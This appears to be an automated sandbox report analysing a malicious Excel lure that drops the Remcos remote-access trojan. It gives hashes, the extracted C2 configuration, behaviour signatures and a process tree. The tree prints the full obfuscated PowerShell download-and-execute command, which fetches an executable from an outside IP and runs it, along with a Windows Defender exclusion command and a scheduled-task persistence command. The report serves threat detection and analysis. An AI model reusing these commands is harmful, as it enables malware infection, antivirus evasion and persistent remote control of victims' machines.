Analysis

  • max time kernel
    148s
  • max time network
    131s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    17-12-2024 11:08

General

  • Target

    Smple_Order-048576744759475945.xls

  • Size

    1.1MB

  • MD5

    df946e734bca37e4eaf06978a0b95ef1

  • SHA1

    c06f8ddc7d5cb1030c516286bd0a660502cbbe35

  • SHA256

    7fb0d13c333aef86316da1494da234eade3b8db44fddd27affc38bae40614744

  • SHA512

    e9dd9266c4dc5721b47d1d4de0e1525482cbec8330e5003f0444d940c99380efae89f7424d709e7aac4962e2541d84b06c1fb7d4686e0949a852e83b39d5dc96

  • SSDEEP

    12288:qymzHJEUiOIBUzMTSgD3DERnLRmF8DrEPTxpsAQx1Zj+j+EPebSA5YiA76UdKX/E:4BaRbARM8+D8Z+jJC50YrNPkly4h

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • mouse_option

    false

  • mutex

    Rmc-GJDISH

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

  • Remcos family
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Evasion via Device Credential Deployment 2 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 3 IoCs
  • Uses the VBS compiler for execution 1 TTPs
  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Detected phishing page

    Hiding page source

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 39 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\Smple_Order-048576744759475945.xls
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:2504
  • C:\Windows\SysWOW64\mshta.exe
    C:\Windows\SysWOW64\mshta.exe -Embedding
    1⤵
    • Blocklisted process makes network request
    • System Location Discovery: System Language Discovery
    • Modifies Internet Explorer settings
    • Modifies system certificate store
    • Suspicious use of WriteProcessMemory
    PID:2260
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
      2⤵
      • Evasion via Device Credential Deployment
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1644
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
        3⤵
        • Blocklisted process makes network request
        • Evasion via Device Credential Deployment
        • Loads dropped DLL
        • Drops file in System32 directory
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1304
        • C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
          "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\feg31p-0.cmdline"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1148
          • C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
            C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC85F.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCC85E.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:2684
        • C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
          "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2564
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\QJXouGSsQAwOR.exe"
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Drops file in System32 directory
            • System Location Discovery: System Language Discovery
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2368
          • C:\Windows\SysWOW64\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QJXouGSsQAwOR" /XML "C:\Users\Admin\AppData\Local\Temp\tmp165E.tmp"
            5⤵
            • System Location Discovery: System Language Discovery
            • Scheduled Task/Job: Scheduled Task
            PID:1268
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
            5⤵
              PID:1276

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      2KB

      MD5

      bf784edee93fca58a4f656c76f07c1b4

      SHA1

      4965c03faaeec20f1b0cefa4844608e403d2569c

      SHA256

      82e0e5014ce5a84bb7fd5e2569c66912fbf4b6262c7f0e94f9a7085ff044188f

      SHA512

      3c480e5ddde056f5b250f66018b78158ecb265f7843416720fbf6dd8038ec2e3d4eca5655c85659d1e7fe5d887cc93e112861beb3aa2524a1d4f9fb2725e6475

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\87063374136EEC47E933C8519BBDFF7F

      Filesize

      471B

      MD5

      90c52d81ab9066022771fa4424ea7e8f

      SHA1

      161e7b2f33071b4f2d52dab3e273e1b9edb55b0b

      SHA256

      a3e87172d27129cc41d87a9f38bab1912cd2d241b1934086678e1d88602c9284

      SHA512

      ec0a5f3a8a846383ddf29c57355516785de9a8c3dbcfad388c22e425298ab84617e45d994fa6946d89eeb6253916d9e8ece51cefced0542f23dc727917a2ff2f

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      1KB

      MD5

      9047d91427fbc84f6f261fa8961d626b

      SHA1

      a51383a0e9eccbe2032f19ff1d5c91e866cfb69f

      SHA256

      3181b9f6bf992319794a86f7f27631619c7fcae1e208f4ced04e64b7ea577a19

      SHA512

      dc21fb378f8ef75fab3c7e80bf1fb7deb2364631a939d1ed113199be83e4a18113795b57620bdbf056876515293f79e8f50b3869b7ad175e073013b0616cba85

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_3431D4C539FB2CFCB781821E9902850D

      Filesize

      488B

      MD5

      983857efe5b5fddf68aba793432eae89

      SHA1

      83ff476faf22175b9ac9bd53089b6a916d3134d3

      SHA256

      8519452e4d2d3910a760644a02f0af4037d48626197dd747ad469479bf84fa5e

      SHA512

      78439a1fa4afd8b7cd8e7c2f2afa11e5a6e579c64346cbf527c2a28e2b75fa77e1856acb38ea83604c4d1dd778df24399bdc102d0df0742fe60d3706022a33e4

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\87063374136EEC47E933C8519BBDFF7F

      Filesize

      480B

      MD5

      102400c8bfe9432c210919ae7ad3b4c9

      SHA1

      cd3f418b8356cd70edffe8304065f30ede9e67b3

      SHA256

      c694bf52db8ef74d13eff0287ca444b1c5ca649508360299e28f6007b76b3501

      SHA512

      4edac3688e98b074c174ab31dcca24e36604151d307f6454cabbb4f02c41b3e44ae5cf250a721f3259d0a099cb582ea65486a8bd2792587170671371113be75c

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

      Filesize

      342B

      MD5

      ddbd2662de0ec120674fd0d69fc0d3a5

      SHA1

      3348ffe3b31fd617f42d766700df7be23412056b

      SHA256

      df4d335eefe59cea3e427f6cb3b8954db853bfa27effffac28fb000a621ccf3a

      SHA512

      8af9530d12ba1bf7aab0323258d356f441ec80820a1c279de782fdccd5649823ae3347c4d96982e4de10fc49702d88a9de00b0653a6697e47024a906b9439060

    • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_D7393C8F62BDE4D4CB606228BC7A711E

      Filesize

      482B

      MD5

      3405778f349129669fc7948f68dfccd2

      SHA1

      ef5685e7583a9aba8e43aea0f4da034ef30687ec

      SHA256

      45b9eec55576c2001787d6dbebeb8324707fa98bd8822e49197f25a738a28602

      SHA512

      0ecd7b30e0625c3060429df20b4f0e42e4db081612208e921e5828d3887bed900c57b8e4a9079bff36b6c823718f30e53bf9f6a0673b2d813dae1143f45729ca

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\crreatedbestthingswithgreatattitudeneedforthat[1].hta

      Filesize

      8KB

      MD5

      e4c5ceeb8c98c1c23a0ff6cd1a4d36e4

      SHA1

      033d24c4375394ad9ede6a94cc80bca6b47a1ef7

      SHA256

      bea2fd609f237d38625a50f7bb5688e7dcfdeb39e5641bb881e257807761b902

      SHA512

      b152a9bcbef1fb5594f0a4f4c9d0e59ffa748a226cefbd967d65aed315d2230ad340d345077866f6d1682e892e5dab9a8b776a7152759db1c4834ab6678337a1

    • C:\Users\Admin\AppData\Local\Temp\CabAF17.tmp

      Filesize

      70KB

      MD5

      49aebf8cbd62d92ac215b2923fb1b9f5

      SHA1

      1723be06719828dda65ad804298d0431f6aff976

      SHA256

      b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

      SHA512

      bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

    • C:\Users\Admin\AppData\Local\Temp\RESC85F.tmp

      Filesize

      1KB

      MD5

      62ed7a7b934ae33aa32d0cc33cfffdad

      SHA1

      72bf11f9f0fe69dca5456cb0364a800f70901cdb

      SHA256

      20c2b6515a3e154f7fddc0b3f691582972f25d99b7f8e2906b3ccfa58b154866

      SHA512

      f21252904459bbd9eda4c7c0a9e7272c96d12ac636d04370e53f5ed2cdd8a7be6e23c2c544e4b320750f35864b25dc2e17b7e56c8db0c332236071146a3f355c

    • C:\Users\Admin\AppData\Local\Temp\TarAF39.tmp

      Filesize

      181KB

      MD5

      4ea6026cf93ec6338144661bf1202cd1

      SHA1

      a1dec9044f750ad887935a01430bf49322fbdcb7

      SHA256

      8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

      SHA512

      6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

    • C:\Users\Admin\AppData\Local\Temp\feg31p-0.dll

      Filesize

      3KB

      MD5

      30e9388e63ba48c0018d56ad0dd5143b

      SHA1

      35032878d298b81ead613a7c8d0daeedbb687be3

      SHA256

      ed3cb3218e611c2d4d60e0e71548210b5643a385d4329dcd2bd46bf02531b6f9

      SHA512

      8d802ab7ff37558bca2b16f1f66a3770354c1c0ec499a2cbfd03a61bb758c91a06f2fd9ccf441de287dbb1a28b10e66c233bc695d47ebc42ba2ea6f5579104e7

    • C:\Users\Admin\AppData\Local\Temp\feg31p-0.pdb

      Filesize

      7KB

      MD5

      9b083eead0c949e42f01335cd9fa5820

      SHA1

      2b969a1da5c07eb805d0ae60d0adf0198169dca3

      SHA256

      f458a416e6e090d85eee43f326a646a7cadf0be1c310dab27643e0b4ff1a15f7

      SHA512

      d46b06dafdbc911214a696a8d7d2a81acc74ae5e8db9c3a8666f74de346802ffcf9e4c2ee45f686f242ad8cbfcdfe9a0daf0e85512faa52be3f892b1d67aaeaa

    • C:\Users\Admin\AppData\Local\Temp\tmp165E.tmp

      Filesize

      1KB

      MD5

      078d0186382e7d1df78ce5d47e0850c2

      SHA1

      b0abd159c081fe855579877888caad632e4f07a8

      SHA256

      46211de3331ea80485186ab3d55d8728445329188a7c1d1fee8d338788a86553

      SHA512

      c11a503a54aa6d8f44b75872441320be56874f76d9e1d12c50985ed4653be40c120455f06cd57bfe5b52739e8c0a0a134be9eeed9764a8fbb59f9200ad298a61

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\C5BXCEF36WYB3J0HOLUT.temp

      Filesize

      7KB

      MD5

      58de9f5b5d6253bbf638b313acdba349

      SHA1

      ef9f01f6bccda55346f231e809a97905be79ae08

      SHA256

      7be79678fe40e3e1dc483d1f4a5d4ca741c9e974349cae98366cc83eb1d71750

      SHA512

      12cfb3517f869b496bd4616cfdf62ca847d67c7dc48ca114c15ebc3096f98c5b4aaac67258d749b0c6f010ad45cec345ba410a48deb0cc3173cdd19f452e9756

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

      Filesize

      7KB

      MD5

      82d0a29a32602d8ecaaf08b918bf552e

      SHA1

      1b5ec66d8a9ff8d8fb7e58fee33dfcf3c86f2312

      SHA256

      cb04b8c06a40eb13c942749cb89266a52fb40555f23564012b233ab6863205b9

      SHA512

      4dcf36788fb482ed5569f81f135ac81d3ac424830a0cfa0d5f7766179391c7f4aed3c1cfde8c4355523d2bc7c19d52530b9ef51ae5847f0dd32920494ed4e1f1

    • \??\c:\Users\Admin\AppData\Local\Temp\CSCC85E.tmp

      Filesize

      652B

      MD5

      3f338f3703e4cb00c3bd11890cec66ad

      SHA1

      d369935952701ad4b4f7981021d2c58993b99e8b

      SHA256

      4910e912b47b938c626dd3292c8a5d4212a2870a252d986dbfe3e07ebb21f923

      SHA512

      249c7ce06a2c87670f353ec7b0dadcf4a3859d1e708a9e6ba26652094e7c59714901401658ab4002aa1c38fd1c8b482deafd9246e7ee0fef14404423b2ca0042

    • \??\c:\Users\Admin\AppData\Local\Temp\feg31p-0.0.cs

      Filesize

      478B

      MD5

      80c03b4485808d996cc8226157f377a7

      SHA1

      7cc7e02b84232b1523c555a349c86fc059a98eff

      SHA256

      240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

      SHA512

      ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

    • \??\c:\Users\Admin\AppData\Local\Temp\feg31p-0.cmdline

      Filesize

      309B

      MD5

      475a256a7b11181573c738731d69d596

      SHA1

      3e7cd4d5e234e7ccf626ee7734e0fda47bd5204d

      SHA256

      614c94881b012cb0a05ac14f027a7e3ef7b8b4c594ba8c453bc4ff139399108f

      SHA512

      7ab2ccc6171a5f44b2ce608b457ce88f112746d7cbb5387a6ce142cf888256ec854cdf0d8e3e824be157450d78bd120645c4be510fff93aebfbbbe05b0dd97b4

    • \Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

      Filesize

      1.1MB

      MD5

      387a4f5a3791b3467434add8798e156c

      SHA1

      3eb4d42ca10ca4705bd8e6411e09b31b8f04914e

      SHA256

      0ccf18985ae70f2004c2ccc11f470b7bbd0884fce623a606a67b2e4e66916791

      SHA512

      7ad99b695ca917759de3bb75bc1f449f80b6b8d44b081b2036e4824a82847df4990c21862b49c71da79d3d4c3e115bcb3edea8b10e7a445be66dfa8da9cb1eff

    • memory/1276-135-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-144-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-149-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-148-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-146-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-142-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-147-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-145-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-125-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-138-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-141-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-140-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-137-0x00000000FFFDE000-0x00000000FFFDF000-memory.dmp

      Filesize

      4KB

    • memory/1276-143-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-133-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-139-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-129-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-127-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/1276-131-0x0000000000400000-0x000000000047F000-memory.dmp

      Filesize

      508KB

    • memory/2260-60-0x0000000002760000-0x0000000002762000-memory.dmp

      Filesize

      8KB

    • memory/2504-1-0x0000000072CED000-0x0000000072CF8000-memory.dmp

      Filesize

      44KB

    • memory/2504-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

      Filesize

      64KB

    • memory/2504-83-0x0000000072CED000-0x0000000072CF8000-memory.dmp

      Filesize

      44KB

    • memory/2504-61-0x0000000002F10000-0x0000000002F12000-memory.dmp

      Filesize

      8KB

    • memory/2564-114-0x0000000005680000-0x0000000005744000-memory.dmp

      Filesize

      784KB

    • memory/2564-113-0x0000000000AF0000-0x0000000000B16000-memory.dmp

      Filesize

      152KB

    • memory/2564-112-0x00000000011E0000-0x00000000012FA000-memory.dmp

      Filesize

      1.1MB